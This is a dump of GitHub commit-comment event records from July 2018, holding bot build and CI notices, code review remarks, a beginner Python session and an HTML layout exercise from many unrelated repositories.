{"id":"7973931921","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728985,"position":null,"line":null,"path":null,"commit_id":"a0a3a050ced04380a29da4a02d31bc1eac874d20","created_at":"2018-07-17T02:14:15Z","updated_at":"2018-07-17T02:14:15Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\ninterpolation of 'repo_url' produced an array or object\n\n</details>"}},"created_at":"2018-07-17T02:14:15Z"}
{"id":"7973932608","type":"CommitCommentEvent","actor":{"login":"ivansg44"},"repo":{"name":"ivansg44/LexMapr"},"payload":{"comment":{"id":29728986,"position":null,"line":null,"path":null,"commit_id":"ec9f43a240f09b0c61d31776555dd68e2eb69d25","created_at":"2018-07-17T02:14:30Z","updated_at":"2018-07-17T02:14:30Z","author_association":"OWNER","body":"By placing apostrophes around All_matched_Terms_with_Resource_IDs, we make full-term direct matches output more similar to other outputs. This will help us with creating -a common call for writing to output across all matches."}},"created_at":"2018-07-17T02:14:30Z"}
{"id":"7973933022","type":"CommitCommentEvent","actor":{"login":"majorthorn"},"repo":{"name":"notepad-plus-plus/notepad-plus-plus"},"payload":{"comment":{"id":29728989,"position":null,"line":null,"path":null,"commit_id":"29adfcc8c9b13c22d65249dff3e2d6885ac0aced","created_at":"2018-07-17T02:14:39Z","updated_at":"2018-07-17T02:14:39Z","author_association":"NONE","body":"Subsection is Obsolete, Has been replaced with SectionGroup as of NSIS version 3.x These commands were pulled from stylers.model.xml. Styles for Subsection were copied to SectionGroup"}},"created_at":"2018-07-17T02:14:39Z"}
{"id":"7973935700","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728994,"position":null,"line":null,"path":null,"commit_id":"2620082a1a7e908c74c5808fd28ec00a99654922","created_at":"2018-07-17T02:15:37Z","updated_at":"2018-07-17T02:15:37Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nobject has no property clone_url\n\n</details>"}},"created_at":"2018-07-17T02:15:37Z"}
{"id":"7973938403","type":"CommitCommentEvent","actor":{"login":"SamarV-121"},"repo":{"name":"Iscle/android_device_lemfo_LD_AUO"},"payload":{"comment":{"id":29729000,"position":null,"line":null,"path":null,"commit_id":"a557ba9f136469764a5be931ac4b4b5f194bb7a3","created_at":"2018-07-17T02:16:38Z","updated_at":"2018-07-17T02:16:38Z","author_association":"NONE","body":"Hi, \r\n    Your build booted on your watch ? \r\nI can help you to bring Los \r\nPM me once on telegram : https://web.telegram.org/#/im?p=@SamarV121"}},"created_at":"2018-07-17T02:16:38Z"}
{"id":"7973940796","type":"CommitCommentEvent","actor":{"login":"SamarV-121"},"repo":{"name":"Iscle/android_device_motorola_taido"},"payload":{"comment":{"id":29729003,"position":null,"line":null,"path":null,"commit_id":"29c841b3cf87e422812d53d85587e6cf126367fa","created_at":"2018-07-17T02:17:31Z","updated_at":"2018-07-17T02:17:31Z","author_association":"NONE","body":"Hi, \r\n    Your build booted on your watch ? \r\nI can help you to bring Los \r\nPM me once on telegram : https://web.telegram.org/#/im?p=@SamarV121"}},"created_at":"2018-07-17T02:17:31Z"}
{"id":"7973942483","type":"CommitCommentEvent","actor":{"login":"diegoagd10"},"repo":{"name":"diegoagd10/invie-github"},"payload":{"comment":{"id":29729006,"position":null,"line":null,"path":null,"commit_id":"de7ad35dec50137c6f2cb8a788a1f7b28ec109a1","created_at":"2018-07-17T02:18:09Z","updated_at":"2018-07-17T02:18:09Z","author_association":"OWNER","body":"Merge done"}},"created_at":"2018-07-17T02:18:09Z"}
{"id":"7973942881","type":"CommitCommentEvent","actor":{"login":"JaPNaA"},"repo":{"name":"JaPNaA/JaPNaA.github.io"},"payload":{"comment":{"id":29729007,"position":null,"line":null,"path":null,"commit_id":"c565d78d93c15f38e9995dae66ccd6afbc4f2203","created_at":"2018-07-17T02:18:18Z","updated_at":"2018-07-17T02:18:18Z","author_association":"OWNER","body":"it's actually a .git folder"}},"created_at":"2018-07-17T02:18:18Z"}
{"id":"7973949162","type":"CommitCommentEvent","actor":{"login":"camalejao"},"repo":{"name":"Raksantos/Projeto-PWEB"},"payload":{"comment":{"id":29729019,"position":null,"line":null,"path":null,"commit_id":"3872a3b1c46870876adf023dfce610245b2a05e4","created_at":"2018-07-17T02:20:46Z","updated_at":"2018-07-17T02:20:46Z","author_association":"COLLABORATOR","body":"falta validar a confirmação de senha"}},"created_at":"2018-07-17T02:20:46Z"}
{"id":"7973949240","type":"CommitCommentEvent","actor":{"login":"qwqwe123"},"repo":{"name":"qwqwe123/github_test"},"payload":{"comment":{"id":29729020,"position":2,"line":1,"path":"test.cpp","commit_id":"f7e780b43f96383ec247e0fdbecc0d822b745fe0","created_at":"2018-07-17T02:20:47Z","updated_at":"2018-07-17T02:20:47Z","author_association":"OWNER","body":"leave comment"}},"created_at":"2018-07-17T02:20:47Z"}
{"id":"7973949311","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29729021,"position":null,"line":null,"path":null,"commit_id":"50148f06304ba1dce9130f9476a73fc2d955e10e","created_at":"2018-07-17T02:20:49Z","updated_at":"2018-07-17T02:20:49Z","author_association":"MEMBER","body":"This commits seems to break ```pos``` handling in Nixpkgs. Now every line number points to this line. Is it possible to revert this until we can figure out a better way to handle broken packages?"}},"created_at":"2018-07-17T02:20:49Z"}
{"id":"7973950419","type":"CommitCommentEvent","actor":{"login":"winways"},"repo":{"name":"patmarion/winpcap"},"payload":{"comment":{"id":29729023,"position":null,"line":null,"path":null,"commit_id":"e1492ede637467457b27ccb94adc34a9fb85d783","created_at":"2018-07-17T02:21:14Z","updated_at":"2018-07-17T02:21:14Z","author_association":"NONE","body":"good comment"}},"created_at":"2018-07-17T02:21:14Z"}
{"id":"7973951245","type":"CommitCommentEvent","actor":{"login":"Martindkchr"},"repo":{"name":"manateelazycat/lazycat-emacs"},"payload":{"comment":{"id":29729024,"position":2,"line":126,"path":"README.md","commit_id":"aa712db1c4ccb64f940b45ef7e116e836df0c05f","created_at":"2018-07-17T02:21:32Z","updated_at":"2018-07-17T02:21:32Z","author_association":"NONE","body":"pity\r\n"}},"created_at":"2018-07-17T02:21:32Z"}
{"id":"7973955432","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29729028,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-17T02:23:09Z","updated_at":"2018-07-17T02:23:09Z","author_association":"CONTRIBUTOR","body":"kaminari의 pagination을 사용하고 있는데 prarms에 검색값이 있을 때 view를 크게 안바꾸고 처리를 해줄려다 보니 이렇게 되었네요. 어떤 방법이 좋은 방법일까요?"}},"created_at":"2018-07-17T02:23:09Z"}
{"id":"7973957461","type":"CommitCommentEvent","actor":{"login":"Olbrasoft"},"repo":{"name":"Olbrasoft/Web"},"payload":{"comment":{"id":29729031,"position":null,"line":null,"path":null,"commit_id":"a16a0084dfcfa24cda5cc43974a25490710ee102","created_at":"2018-07-17T02:23:53Z","updated_at":"2018-07-17T02:23:53Z","author_association":"OWNER","body":"zz"}},"created_at":"2018-07-17T02:23:53Z"}
{"id":"7973974753","type":"CommitCommentEvent","actor":{"login":"7upcat"},"repo":{"name":"reap-platform/reap-cli"},"payload":{"comment":{"id":29729054,"position":null,"line":null,"path":null,"commit_id":"2a0c78ea2f07353af65a50b37f29eadf800c9aab","created_at":"2018-07-17T02:30:01Z","updated_at":"2018-07-17T02:30:01Z","author_association":"CONTRIBUTOR","body":"@reactNew  为什么是 editRecord 存在则是创建、否则是编辑 ，完全不合逻辑啊  =。=！"}},"created_at":"2018-07-17T02:30:01Z"}
{"id":"7973980907","type":"CommitCommentEvent","actor":{"login":"4xDMG"},"repo":{"name":"flyingllama87/LittleTiggy"},"payload":{"comment":{"id":29729065,"position":8,"line":8,"path":"LittleTiggy/Animation.cs","commit_id":"10b6be24da081f9956a5c295f0396b93fbbc79cd","created_at":"2018-07-17T02:32:10Z","updated_at":"2018-07-17T02:32:10Z","author_association":"NONE","body":"Is this code all boilerplate from the frameworks you used or is this you @flyingllama87 ?"}},"created_at":"2018-07-17T02:32:10Z"}
{"id":"7973981427","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29729066,"position":null,"line":null,"path":null,"commit_id":"1275c47b6d1321eebe347316bf7cf0fa36ec547a","created_at":"2018-07-17T02:32:19Z","updated_at":"2018-07-17T02:32:19Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-74](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-74).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-74-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T02:32:19Z"}
{"id":"7973984382","type":"CommitCommentEvent","actor":{"login":"Dannyiy"},"repo":{"name":"Dannyiy/asunadbot"},"payload":{"comment":{"id":29729071,"position":null,"line":null,"path":null,"commit_id":"cfec115d87f63dd200093204fad152dddf347ee9","created_at":"2018-07-17T02:33:18Z","updated_at":"2018-07-17T02:33:18Z","author_association":"OWNER","body":"Why? This is the same 👍 "}},"created_at":"2018-07-17T02:33:18Z"}
{"id":"7973986783","type":"CommitCommentEvent","actor":{"login":"Dannyiy"},"repo":{"name":"floodlock/asunadbot"},"payload":{"comment":{"id":29729074,"position":null,"line":null,"path":null,"commit_id":"cfec115d87f63dd200093204fad152dddf347ee9","created_at":"2018-07-17T02:34:11Z","updated_at":"2018-07-17T02:34:11Z","author_association":"NONE","body":"This is the same 👍 "}},"created_at":"2018-07-17T02:34:11Z"}
{"id":"7973987607","type":"CommitCommentEvent","actor":{"login":"ptorrezao"},"repo":{"name":"ptorrezao/PTZ.HomeManagement"},"payload":{"comment":{"id":29729075,"position":null,"line":null,"path":null,"commit_id":"184524b447b4df873c9b9e913110bd95a9ae232e","created_at":"2018-07-17T02:34:27Z","updated_at":"2018-07-17T02:34:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Importador de Contas - CRUD para Contas](https://trello.com/c/gDkYqkKB/8-importador-de-contas-crud-para-contas)"}},"created_at":"2018-07-17T02:34:27Z"}
{"id":"7973988554","type":"CommitCommentEvent","actor":{"login":"ptorrezao"},"repo":{"name":"ptorrezao/PTZ.HomeManagement"},"payload":{"comment":{"id":29729077,"position":null,"line":null,"path":null,"commit_id":"c69f50a88c69670614ea828870d8de63e22e9a36","created_at":"2018-07-17T02:34:47Z","updated_at":"2018-07-17T02:34:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Importador de Contas - Dashboard](https://trello.com/c/WILgDkh3/9-importador-de-contas-dashboard)"}},"created_at":"2018-07-17T02:34:47Z"}
{"id":"7973988790","type":"CommitCommentEvent","actor":{"login":"ptorrezao"},"repo":{"name":"ptorrezao/PTZ.HomeManagement"},"payload":{"comment":{"id":29729079,"position":null,"line":null,"path":null,"commit_id":"296b42366dd7b5f69b76183b7d54488e842fc0eb","created_at":"2018-07-17T02:34:52Z","updated_at":"2018-07-17T02:34:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Importador de Contas - Dashboard](https://trello.com/c/WILgDkh3/9-importador-de-contas-dashboard)"}},"created_at":"2018-07-17T02:34:52Z"}
{"id":"7973990527","type":"CommitCommentEvent","actor":{"login":"teto"},"repo":{"name":"sourabhjains/linux"},"payload":{"comment":{"id":29729083,"position":26,"line":265,"path":"tools/lkl/lib/utils.c","commit_id":"c6225a7cefac800d6bac0c19651948982595bc44","created_at":"2018-07-17T02:35:32Z","updated_at":"2018-07-17T02:35:32Z","author_association":"NONE","body":"lkl_sys_XXX refers to syscall XXX. thus you can find the documentation through `man read`. In this case the use of size looks good."}},"created_at":"2018-07-17T02:35:32Z"}
{"id":"7973992105","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29729085,"position":null,"line":null,"path":null,"commit_id":"07de2c69b05a8aa9554bcd0926fb5b9b97dd3e46","created_at":"2018-07-17T02:36:05Z","updated_at":"2018-07-17T02:36:05Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.228`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/228) :tada:"}},"created_at":"2018-07-17T02:36:05Z"}
{"id":"7973997440","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29729098,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-17T02:38:02Z","updated_at":"2018-07-17T02:38:02Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-17T02:38:02Z"}
{"id":"7973999576","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29729102,"position":null,"line":null,"path":null,"commit_id":"07de2c69b05a8aa9554bcd0926fb5b9b97dd3e46","created_at":"2018-07-17T02:38:49Z","updated_at":"2018-07-17T02:38:49Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.345`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404704429) :tada:"}},"created_at":"2018-07-17T02:38:49Z"}
{"id":"7973999959","type":"CommitCommentEvent","actor":{"login":"lizzha"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29729103,"position":32,"line":26,"path":"AutomationManager.ps1","commit_id":"893dfd927ec578f11e7c0984a6dbf30f53e36a35","created_at":"2018-07-17T02:38:57Z","updated_at":"2018-07-17T02:38:57Z","author_association":"COLLABORATOR","body":"How do we define the version? Is it the version of the script itself?\r\nMaybe it's not necessary to maintain a version in the script"}},"created_at":"2018-07-17T02:38:57Z"}
{"id":"7974000499","type":"CommitCommentEvent","actor":{"login":"telileisici"},"repo":{"name":"glebysg/TA"},"payload":{"comment":{"id":29729106,"position":null,"line":null,"path":null,"commit_id":"9a3b91ced9b048879a498bd84753ca4dc2b39098","created_at":"2018-07-17T02:39:09Z","updated_at":"2018-07-17T02:39:09Z","author_association":"NONE","body":"Hello！I‘ve watched your video,LAB 3 - (Tutorial 1) Advanced Collision Configuration,on Youtube.But I can't write the code.Can you upload on Github or send me by email( sperman@yeah.net )?Thanks a lot!"}},"created_at":"2018-07-17T02:39:09Z"}
{"id":"7974001482","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29729107,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-17T02:39:30Z","updated_at":"2018-07-17T02:39:30Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-17T02:39:30Z"}
{"id":"7974001542","type":"CommitCommentEvent","actor":{"login":"NandiniSharma13"},"repo":{"name":"NandiniSharma13/JavaSources"},"payload":{"comment":{"id":29729108,"position":null,"line":null,"path":null,"commit_id":"bde17d97897211fc95b4d8277fd6c70495cf55d6","created_at":"2018-07-17T02:39:32Z","updated_at":"2018-07-17T02:39:32Z","author_association":"OWNER","body":"Checkmarx scan results 17 Jul 2018 08:09 UTC +05:30\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">13</td>\r\n<td align=\"center\">143</td>\r\n<td align=\"center\">370</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://localhost/CxWebClient/ViewerMain.aspx?scanid=1000058&projectid=49\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/NandiniSharma13/JavaSources/commit/bde17d97897211fc95b4d8277fd6c70495cf55d6\">bde17d97897211fc95b4d8277fd6c70495cf55d6</a></td><td>@</td></tr></table>\r\n"}},"created_at":"2018-07-17T02:39:32Z"}
{"id":"7974004728","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29729110,"position":null,"line":null,"path":null,"commit_id":"9e4492d67070ddf473bf10f440677886b0c63440","created_at":"2018-07-17T02:40:35Z","updated_at":"2018-07-17T02:40:35Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-75](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-75).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-75-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T02:40:35Z"}
{"id":"7974011898","type":"CommitCommentEvent","actor":{"login":"Reach4dStar"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29729114,"position":null,"line":null,"path":null,"commit_id":"3aa03ebbca514352e41615962fdef034d40a9bc3","created_at":"2018-07-17T02:43:09Z","updated_at":"2018-07-17T02:43:09Z","author_association":"NONE","body":"Python 3.7.0 (v3.7.0:1bf9cc5093, Jun 27 2018, 04:06:47) [MSC v.1914 32 bit (Intel)] on win32\r\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\r\n>>> #soc-wk1-Frances-Endencia+cert+pyth\r\n... #calculator\r\n... print(1+2)\r\n3\r\n>>> print(2*3)\r\n6\r\n>>> print(5-8)\r\n-3\r\n>>> print(9/2)\r\n4.5\r\n>>> print(5*(12-8)+(-15))\r\n5\r\n>>> print(98+(59872/(13*8)x-5)\r\n  File \"<stdin>\", line 1\r\n    print(98+(59872/(13*8)x-5)\r\n                          ^\r\nSyntaxError: invalid syntax\r\n>>> print(98+(59872/(13*8))8-5)\r\n  File \"<stdin>\", line 1\r\n    print(98+(59872/(13*8))8-5)\r\n                           ^\r\nSyntaxError: invalid syntax\r\n>>> print(98+(59872/(13*8))(8-5)\r\n... print(2**8)\r\n  File \"<stdin>\", line 2\r\n    print(2**8)\r\n        ^\r\nSyntaxError: invalid syntax\r\n>>> print(2**8)\r\n256\r\n>>> print(1<<9)\r\n512\r\n>>> #How many hours in a year?\r\n... print(24*365)\r\n8760\r\n>>> #How many minutes in a decade?\r\n... print(60 min/hr)*(24 hr/day)\r\n  File \"<stdin>\", line 2\r\n    print(60 min/hr)*(24 hr/day)\r\n               ^\r\nSyntaxError: invalid syntax\r\n>>> # How many minutes in a decade?\r\n... print(60*24*365*10)\r\n5256000\r\n>>> # What is my age in seconds\r\n... print((60*60*24*365*53)+(31*9*60*60*24))\r\n1695513600 seconds"}},"created_at":"2018-07-17T02:43:09Z"}
{"id":"7974014369","type":"CommitCommentEvent","actor":{"login":"briankung"},"repo":{"name":"PollenCam/pollen-backend"},"payload":{"comment":{"id":29729115,"position":null,"line":null,"path":null,"commit_id":"6da70b6b0fe55a921624912d53aff46e5535f164","created_at":"2018-07-17T02:44:04Z","updated_at":"2018-07-17T02:44:04Z","author_association":"CONTRIBUTOR","body":"https://github.com/travis-ci/travis-ci/issues/8537#issuecomment-404451506\r\n\r\nhttps://travis-ci.org/PollenCam/pollen-backend 👈 Passing 😎"}},"created_at":"2018-07-17T02:44:04Z"}
{"id":"7974015176","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29729117,"position":null,"line":null,"path":null,"commit_id":"98823cdfb9b4efb54a70a7d96455dfbef1dd01e1","created_at":"2018-07-17T02:44:21Z","updated_at":"2018-07-17T02:44:21Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-77](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-77).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-77-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T02:44:21Z"}
{"id":"7974015341","type":"CommitCommentEvent","actor":{"login":"wengyunne"},"repo":{"name":"wengyunne/wengyunne.github.io"},"payload":{"comment":{"id":29729118,"position":null,"line":null,"path":null,"commit_id":"82f08a995a9f2c2fc4d3d032d0d62804201d61c4","created_at":"2018-07-17T02:44:24Z","updated_at":"2018-07-17T02:44:24Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <meta charset=\"utf-8\">\r\n  <title>Tabbed info box</title>\r\n  <style>\r\n  header{width: 100%;height: 30px;background-color: #333333;    width: 950px;\r\n    margin: 0 auto;}\r\n  header{width: 100%;height: 30px;background-color: #333333;width:960px;}\r\n.container{ height:950px;overflow:hidden;}\r\n.middle{width: 100%; background-color: #fff;float:left;}\r\n.middle{width: 100%; background-color: #fff;float:left;}\r\n\r\nfooter{    width: 950px;\r\n    margin: 0 auto; height: 30px;background-color: #666666;text-align:center;}\r\n.container{display: flex;}\r\n.pagecontent{display: flex;flex: 1 222px;height:175px;}\r\n.logo h1{    \r\n\r\nline-height: 30px;\r\n    font-size: 20px;\r\n\tpadding:0;\r\n\tmargin:0;\r\n    padding-left: 5%; color: white;}\r\n\t.mainbanner{\r\n\theight:300px;\r\n   }\r\n\tli{\r\n\tlist-style-type:none;}\r\n\t.logo{\r\n\tfloat:left;}\r\n\t.links{float:right;}\r\n\t.links a{text-decoration:underline; padding-left:10px;    font-size: 10px;\r\n    line-height: 29px;\r\n    color: white;}\r\n\t\r\n\t.mainbanner{\r\n\tbackground-color:#66bb33;;    width: 950px;\r\n    margin: 0 auto;}\r\n\t.content{display:flex;width:950px;height:580px;flex-wrap:wrap;}\r\n\t.maincontent{height:650px;display:flex;overflow:hidden; margin:0 auto;}\r\n\tul{ margin:  0;}\r\n\tul,li{margin:0px;padding:0px;border:none;list-style;none;}\r\n\t ul li{width:100%;}\r\n\t li{margin:0px; padding:0px; overflow:hidden;}\r\n\t .pagecontent{\r\n\t align-items:stretch;    margin: 1px;\r\n\t }\r\n.maincontent:after{\r\ndisplay:block;\r\nclear:both;\r\n}  \r\n.maincontent{\r\nwidth:950px;\r\n\r\n}\r\nfooter h4{    font-size: 10px;\r\n    line-height: 29px;\r\n    color: white;}\r\n</style>\r\n</head>\r\n<body>\r\n<!-- \r\n设计稿描述：\r\n\r\n设计稿分为头部，中间的Banner，主导航，内容区域，底部\r\n头部区域为100%宽的一个深色背景，头部中间有一块960px的定宽居中区域，里面包括了左边\r\n的Logo和右上角导航Banner为100%宽的区块，中间右下方有banner轮显的当前图片数字的示例\r\n，其中正在显示的图片对应的数字有特殊样式（注意不需要实现轮显banner的业务逻辑，只\r\n是按照设计稿做静态样式）主导航区域，有一个100%宽的灰色线条，线条之上，在中间960px\r\n区域是导航菜单，当前正在浏览页对应的菜单有特殊样式主要内容区域，宽度为960px，里面\r\n每个内容都有至少80px的padding，每一个内容的宽度均为自适应，可以使用flex布局 -->\r\n\r\n<header>\r\n<h4></h4>\r\n<div class=\"logo\"><h1>logo</h1></div>\r\n<div class=\"links\"><a>Gitub</a><a>Register</a><a>Login</a></div>\r\n</header>\r\n\r\n<div class=\"container\">\r\n<div class=\"middle\">\r\n<div class=\"mainbanner\"><ul><li>1</li><li>2</li><li>3</li><li>4</li></ul></div>\r\n<div class=\"maincontent\"><ul class=\"middle\">\r\n<li><h4>HOME</h4><div class=\"content\"><div class=\"pagecontent\">This is Content 1</div><div class=\"pagecontent\">This is Content 2</div><div class=\"pagecontent\">This is Content 3</div><div class=\"pagecontent\">This is Content 4</div><div class=\"pagecontent\">This is Content 5</div><div class=\"pagecontent\">This is Content 1</div><div class=\"pagecontent\">This is Content 2</div><div class=\"pagecontent\">This is Content 3</div><div class=\"pagecontent\">This is Content 4</div><div class=\"pagecontent\">This is Content 5</div></div></li>\r\n<li><h4>PROFILE</h4></li>\r\n<li><h4>ABOUT</h4></li></ul></div>\r\n</h4></div>\r\n</div> \r\n</div>\r\n\r\n<footer><h4>2018 ife.baidu.com</h4></footer>\r\n\r\n\r\n\r\n<script>\r\n</script>\r\n  \r\n</body>\r\n</html>\r\n"}},"created_at":"2018-07-17T02:44:24Z"}
{"id":"7974016714","type":"CommitCommentEvent","actor":{"login":"gaskinwang"},"repo":{"name":"gaskinwang/ShowData"},"payload":{"comment":{"id":29729119,"position":null,"line":null,"path":null,"commit_id":"1e433caf91d9cdcc1cf84c83575a777d6e10c608","created_at":"2018-07-17T02:44:53Z","updated_at":"2018-07-17T02:44:53Z","author_association":"OWNER","body":"![-1](https://user-images.githubusercontent.com/37646768/42793801-6c0340ba-89ae-11e8-893a-b5e93ba892fa.png)\r\n"}},"created_at":"2018-07-17T02:44:53Z"}
{"id":"7974024265","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pypeg2-feedstock"},"payload":{"comment":{"id":29729126,"position":null,"line":null,"path":null,"commit_id":"89a4f54e434c61a45acaade8a089741f37727cac","created_at":"2018-07-17T02:47:30Z","updated_at":"2018-07-17T02:47:30Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @v0lat1le were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @v0lat1le were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-17T02:47:30Z"}
{"id":"7974027523","type":"CommitCommentEvent","actor":{"login":"taeyoon-kim"},"repo":{"name":"taeyoon-kim/memoming_git.Test"},"payload":{"comment":{"id":29729130,"position":null,"line":null,"path":null,"commit_id":"ef7546e21d7e58e17f732867735c435a30a3b092","created_at":"2018-07-17T02:48:42Z","updated_at":"2018-07-17T02:48:42Z","author_association":"OWNER","body":"테스트"}},"created_at":"2018-07-17T02:48:42Z"}
{"id":"7974028415","type":"CommitCommentEvent","actor":{"login":"mxito3"},"repo":{"name":"ljcan/Hive_Project"},"payload":{"comment":{"id":29729133,"position":null,"line":null,"path":null,"commit_id":"59cf71051036f8420448d54ebaccb8c46c2629c6","created_at":"2018-07-17T02:49:01Z","updated_at":"2018-07-17T02:49:01Z","author_association":"NONE","body":"厉害厉害"}},"created_at":"2018-07-17T02:49:01Z"}
{"id":"7974030440","type":"CommitCommentEvent","actor":{"login":"joshinils"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29729135,"position":null,"line":null,"path":null,"commit_id":"79805bdb1f26007bcd965b87edb2a92033884589","created_at":"2018-07-17T02:49:45Z","updated_at":"2018-07-17T02:49:45Z","author_association":"COLLABORATOR","body":"sry @philsupertramp, aber da hattest du einige sachen vergessen zu schließen, und wo ich dabei war, hab ich gleich die statistik von den  tags getrennt"}},"created_at":"2018-07-17T02:49:45Z"}
